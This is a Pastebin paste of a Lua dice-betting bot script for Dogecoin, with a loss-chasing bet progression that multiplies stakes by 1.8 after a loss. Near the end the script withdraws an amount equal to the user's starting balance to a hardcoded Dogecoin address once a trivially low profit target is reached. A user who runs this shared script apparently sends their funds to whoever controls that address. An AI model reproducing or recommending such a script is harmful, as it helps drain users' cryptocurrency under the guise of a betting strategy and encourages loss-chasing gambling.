Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- chance = 90
- bethigh = true
- basebet = balance/550
- nextbet = basebet
- amount=balance
- profittarget=1
- stoptarget=0
- function dobet()
- if (win) then
- chance = 90
- basebet = balance/550
- nextbet = basebet
- else
- if chance == 45.00 then
- nextbet = previousbet * 1.8
- else
- chance = 45.00
- nextbet = basebet
- print("-----------------------------------------")
- print(" ")
- print("profit") print(profit) print("profit")
- print(" ")
- print("Balancel") print(balance)
- print(" ")
- print("-----------------------------------------")
- resetseed();
- end
- end
- if balance <= stoptarget then
- stop()
- end
- if (balance) >= profittarget then
- ching()
- alarm()
- print("Balance ") print(balance)
- print(" ")
- print("TARGET made!!!")
- print(" ")
- print("TARGET made!!!")
- print(" ")
- print("TARGET made!!!")
- print(" ")
- print("TARGET made!!!")
- print(" ")
- print("profit ") print(profit) print(" profit")
- print(" ")
- print("Withdrawing Target Amount ") print(amount) print(" DOGE")
- withdraw(amount,"MBwvmCx1R2q8mfhEZyfd9F6hbAw2D87zcs")
- print(" ")
- print("you have it withdrawn BRO!!!")
- resetseed();
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement